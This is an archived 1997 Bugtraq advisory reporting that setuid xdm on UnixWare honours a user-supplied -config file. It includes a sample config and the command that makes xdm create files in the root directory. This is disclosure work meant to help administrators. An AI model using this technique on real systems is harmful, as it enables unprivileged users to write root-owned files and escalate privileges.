Bugtraq: XDM bug

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

XDM bug

From: angelo () tawny ssd hcsc com (Angel Ortiz)
Date: Thu, 2 Jan 1997 17:25:18 -0500


BUGTRAQRS:

**************************DISCLAIMER AND WARNING***********************

The following information is provided as information to users in order
to safeguard their systems.  Users using this exploit are totally
responsible for their actions
**********************************************************************

I hope the following has not been documented in the past.  If it has
been, my humble apologies.

Any way here is the problem.

System: UNIX Ware systems with X

Symptom:
/usr/X/bin/xdm is setuid

Exploit:
If you do a man on xdm you will see that there is a command line
option for a configuration file (-config).

xdm [-config config_file] [-nodaemon] [-debug debug_level]
                   [-error error_log_file]       [-resources resource_file]
                   [-server server_entry]

By default, xdm uses the /usr/lib/xdm/xdm-config file.  Out of
curiosity, if you copy this file to your home directory you will be
able to modify it and change where certain files are written to.

For example, here is a sample xdm-config file which can reside in your
home directory.

----------------------- Cut Here ------------------------------
#ident  "@(#)xdm:config/xdm-conf.cpp    1.12.1.9"
DisplayManager.companyLogoPixmap:   /usr/X/lib/pixmaps/Nlogo.xpm
DisplayManager.backgroundPixmap: /usr/X/lib/pixmaps/Npaper.xpm
DisplayManager.showMnemonic:    1
DisplayManager.errorLogFile:    /DANGEROUS-FILE
DisplayManager.pidFile:     /ALSO-DANGEROUS-FILE
DisplayManager.keyFile:     /usr/X/lib/xdm/xdm-keys
DisplayManager.servers:     /usr/X/lib/xdm/Xservers
DisplayManager._0.authorize:    true
DisplayManager*authComplain:    false
DisplayManager._0.setup:        /usr/X/lib/xdm/Xsetup_0
DisplayManager._0.terminateServer:  true

--------------------- Cut Here -------------------------------

Now, if you execute the following commands from a UNIX prompt:

xdm -config dangerous-xdm-config-file

You will create two files in the / directory.

Guess what they are.  Guess what can be done with such capabilities.

Any way, please verify xdm setuid on your systems and please let the
bugtraq news group know if it exists on other systems.

Regards,

By Date By Thread

Current thread:

XDM bug Angel Ortiz (Jan 02)
- <Possible follow-ups>
- Re: XDM bug Steve \ (Jan 03)
  - Re: XDM bug jamie (Jan 03)
    - Re: XDM bug Alex Belits (Jan 03)
    - serious security bug in wu-ftpd v2.4 Aleph One (Jan 04)
    - Re: serious security bug in wu-ftpd v2.4 Wietse Venema (Jan 04)